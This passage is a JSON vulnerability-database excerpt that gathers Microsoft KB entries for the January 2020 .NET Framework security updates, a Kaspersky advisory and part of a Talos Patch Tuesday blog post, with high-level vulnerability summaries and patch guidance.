shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft 
Security</a></li> </ul></body></html>", "edition": 7, "modified": "2020-01-14T17:56:26", "id": "KB4535103", "href": "https://support.microsoft.com/en-us/help/4535103/", "published": "2020-01-14T17:56:26", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4535103)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:52:09", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security and Quality Rollup for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4535105)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). 
</p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see <span><span><a href=\"https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update\">KB 4474419</a>. </span></span></li> <li> All updates for .NET Framework 4.6 for Windows Server 2008 Service Pack 2 (SP2) require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see <a href=\"https://support.microsoft.com/en-us/help/4019990\">KB 4019990</a>. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. 
</li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532944\" managed-link=\"\">4532944</a> <span>Description of the Security and Quality Rollup for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4532944)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532929\" managed-link=\"\">4532929</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows Server 2008 SP2 (KB4532929)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532932\" managed-link=\"\">4532932</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.6 for Windows Server 2008 SP2 (KB4532932)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 8, "modified": "2020-01-14T17:56:26", "id": "KB4535105", "href": "https://support.microsoft.com/en-us/help/4535105/", "published": "2020-01-14T17:56:26", "title": "Security and Quality Rollup for .NET 
Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4535105)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:35:53", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>January 14, 2020-KB4532936 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1803</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>January 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). 
</p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532936\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. </p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532936.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. 
</p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:24", "id": "KB4532936", "href": "https://support.microsoft.com/en-us/help/4532936/", "published": "2020-01-14T00:00:00", "title": "January 14, 2020-KB4532936 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1803", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:50:42", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4534977)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> 
</div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see <a href=\"https://support.microsoft.com/en-us/help/4019990\">KB 4019990</a>. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532958\" managed-link=\"\">4532958</a> <span>Description of the Security Only Update for .NET Framework 3.5 for Windows Server 2012 (KB4532958)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532963\" managed-link=\"\">4532963</a> <span>Description of the Security Only Update for .NET Framework 4.5.2 for Windows Server 2012 (KB4532963)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532969\" managed-link=\"\">4532969</a> <span>Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4532969)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532950\" managed-link=\"\">4532950</a> <span>Description of the Security Only Update for .NET Framework 4.8 for Windows Server 2012 (KB4532950)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" 
shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:28", "id": "KB4534977", "href": "https://support.microsoft.com/en-us/help/4534977/", "published": "2020-01-14T17:56:28", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4534977)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:44:59", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>January 14, 2020-KB4532935 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1709</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>January 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). 
</p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532935\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. </p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532935.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. 
</p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:24", "id": "KB4532935", "href": "https://support.microsoft.com/en-us/help/4532935/", "published": "2020-01-14T00:00:00", "title": "January 14, 2020-KB4532935 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1709", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:43:51", "bulletinFamily": "info", "cvelist": ["CVE-2020-0646", "CVE-2020-0603", "CVE-2020-0602", "CVE-2020-0606", "CVE-2020-0605"], "description": "### *Detect date*:\n01/14/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Developer Tools. 
Malicious users can exploit these vulnerabilities to execute arbitrary code or cause denial of service.\n\n### *Affected products*:\n.NET Core 3.0 \nASP.NET Core 3.0 \nASP.NET Core 2.1 \nMicrosoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5.1 \nMicrosoft .NET Framework 3.5 AND 4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5 AND 4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5 AND 4.7.2 \nMicrosoft .NET Framework 4.6/4.6.1/4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 4.8 \nMicrosoft .NET Framework 4.5.2 \nMicrosoft .NET Framework 3.5 AND 4.8 \n.NET Core 3.1 \nMicrosoft .NET Framework 3.5 \nMicrosoft .NET Framework 4.6 \nMicrosoft .NET Framework 3.0 Service Pack 2 \nASP.NET Core 3.1\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0603](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0603>) \n[CVE-2020-0602](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0602>) \n[CVE-2020-0605](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0605>) \n[CVE-2020-0646](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0646>) \n[CVE-2020-0606](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0606>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft .NET Framework](<https://threats.kaspersky.com/en/product/Microsoft-.NET-Framework/>)\n\n### *CVE-IDS*:\n[CVE-2020-0603](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0603>)0.0Unknown \n[CVE-2020-0602](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0602>)0.0Unknown \n[CVE-2020-0605](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0605>)0.0Unknown \n[CVE-2020-0646](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0646>)0.0Unknown 
\n[CVE-2020-0606](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0606>)0.0Unknown\n\n### *KB list*:\n[4535101](<http://support.microsoft.com/kb/4535101>) \n[4534306](<http://support.microsoft.com/kb/4534306>) \n[4534978](<http://support.microsoft.com/kb/4534978>) \n[4534976](<http://support.microsoft.com/kb/4534976>) \n[4532933](<http://support.microsoft.com/kb/4532933>) \n[4534276](<http://support.microsoft.com/kb/4534276>) \n[4532938](<http://support.microsoft.com/kb/4532938>) \n[4532936](<http://support.microsoft.com/kb/4532936>) \n[4534271](<http://support.microsoft.com/kb/4534271>) \n[4534979](<http://support.microsoft.com/kb/4534979>) \n[4532935](<http://support.microsoft.com/kb/4532935>) \n[4535103](<http://support.microsoft.com/kb/4535103>) \n[4535104](<http://support.microsoft.com/kb/4535104>) \n[4535105](<http://support.microsoft.com/kb/4535105>) \n[4534293](<http://support.microsoft.com/kb/4534293>) \n[4534977](<http://support.microsoft.com/kb/4534977>) \n[4535102](<http://support.microsoft.com/kb/4535102>) \n[4556826](<http://support.microsoft.com/kb/4556826>) \n[4556813](<http://support.microsoft.com/kb/4556813>) \n[4556812](<http://support.microsoft.com/kb/4556812>) \n[4556807](<http://support.microsoft.com/kb/4556807>) \n[4556406](<http://support.microsoft.com/kb/4556406>) \n[4556405](<http://support.microsoft.com/kb/4556405>) \n[4556404](<http://support.microsoft.com/kb/4556404>) \n[4556403](<http://support.microsoft.com/kb/4556403>) \n[4556402](<http://support.microsoft.com/kb/4556402>) \n[4556401](<http://support.microsoft.com/kb/4556401>) \n[4556400](<http://support.microsoft.com/kb/4556400>) \n[4556441](<http://support.microsoft.com/kb/4556441>) \n[4552929](<http://support.microsoft.com/kb/4552929>) \n[4552926](<http://support.microsoft.com/kb/4552926>) \n[4552931](<http://support.microsoft.com/kb/4552931>) \n[4556399](<http://support.microsoft.com/kb/4556399>) \n[4552928](<http://support.microsoft.com/kb/4552928>)\n\n### *Microsoft 
official advisories*:", "edition": 1, "modified": "2020-07-17T00:00:00", "published": "2020-01-14T00:00:00", "id": "KLA11634", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11634", "title": "\r KLA11634Multiple vulnerabilities in Microsoft Developer Tools ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2020-01-17T23:27:08", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0601", "CVE-2020-0602", "CVE-2020-0603", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0612", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0616", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0621", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0624", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0636", "CVE-2020-0637", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646", "CVE-2020-0647", "CVE-2020-0650", "CVE-2020-0651", "CVE-2020-0652", "CVE-2020-0653", "CVE-2020-0654", "CVE-2020-0656"], "description": "[](<http://3.bp.blogspot.com/-bIERk6jqSvs/XKypl8tltSI/AAAAAAAAFxU/d9l6_EW1Czs7DzBngmhg8pjdPfhPAZ3yACK4BGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg>) \n \n \n \n \n \n \n \n \n \n \n_By Jon Munshaw._ \n_ \n_**Updated January 15th: Added an Advanced Custom Detection (ACD) signature for AMP that can be used to detect exploitation of CVE-2020-0601 by **_**spoofing certificates masquerading as a Microsoft ECC Code Signing Certificate Authority.**_ \n \nMicrosoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. 
This month's [Patch Tuesday](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Jan>) covers 49 vulnerabilities, eight of which are considered critical. \n \nThis month's security update is particularly important for its disclosure of two vulnerabilities related to a core cryptographic component in all versions of Windows. CVE-2020-0601 could allow an attacker to use cryptography to sign a malicious executable, making the file appear as if it was from a trusted source. The victim would have no way of knowing if the file was malicious. Cyber security reporter Brian Krebs [says the vulnerability is so serious](<https://krebsonsecurity.com/2020/01/cryptic-rumblings-ahead-of-first-2020-patch-tuesday/>), Microsoft secretly deployed a patch to branches of the U.S. military prior to today. \n \nJanuary's update is also the last that will provide free updates to Windows 7 and Windows Server 2008/2008 R2. \n \nTalos also released a new set of [SNORT\u24c7 rules](<https://snort.org/advisories/talos-rules-2020-01-14>) that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post [here](<https://blog.snort.org/2020/01/snort-rule-update-for-jan-14-2020.html>). \n \n\n\n### Critical vulnerabilities\n\nMicrosoft disclosed eight critical vulnerabilities this month, all of which we will highlight below. \n \n[CVE-2020-0603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0603>), [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605>), [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606>) and [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646>) are all remote code execution vulnerabilities in the .NET and ASP.NET core software. 
All four of these vulnerabilities can be triggered if a user opens a malicious, specially crafted file while using an affected version of .NET or ASP.NET Core. If successful, an attacker could then execute arbitrary code in the context of the current user. These bugs exist in how the software handles objects in memory. \n \n[CVE-2020-0609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609>) and [CVE-2020-0610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610>) are remote code execution vulnerabilities in the Windows Remote Desktop Protocol Gateway Server. An attacker could exploit these bugs by sending a specially crafted request to the victim's system RDP Gateway via RDP. This vulnerability is pre-authentication and does not require any user interaction. \n \n[CVE-2020-0611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0611>) is a remote code execution vulnerability in the Windows Remote Desktop Protocol client. This vulnerability can be triggered if a user visits a malicious, specially crafted server. An attacker would need to trick the user into connecting to this server, either via a malicious file or a man-in-the-middle technique. The attacker could then execute arbitrary code on the victim's machine. \n \n[CVE-2020-0640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0640>) is a memory corruption vulnerability that exists in the way the Internet Explorer web browser handles objects in memory. An attacker could use this bug to corrupt the victim machine, and then gain the ability to execute arbitrary code. A user can trigger this vulnerability by visiting a malicious, attacker-controlled web page in Internet Explorer. \n \n\n\n### Important vulnerabilities\n\nThis release also contains 41 important vulnerabilities, three of which we will highlight below. 
\n \n[CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) is a spoofing vulnerability in Windows CryptoAPI. The specific component, crypt32.dll, improperly validates Elliptic Curve Cryptography certificates. An attacker could exploit this bug to spoof a code-signing certificate and secretly sign a file, making that file appear as if it is from a trusted source. A malicious actor could also use this vulnerability to conduct man-in-the-middle attacks and decrypt confidential information. \n \n[CVE-2020-0616](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0616>) is a denial-of-service vulnerability in Windows due to the way the operating system handles hard links. An attacker needs to log onto the victim machine to exploit this bug, and then run a specially crafted application that would allow them to overwrite system files. \n \n[CVE-2020-0654](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0654>) is a vulnerability in the OneDrive app for Android devices that could allow an attacker to bypass certain security features. If the user accesses a link to a file in a OneDrive folder a certain way, they could bypass the passcode or fingerprint requirements for the app. 
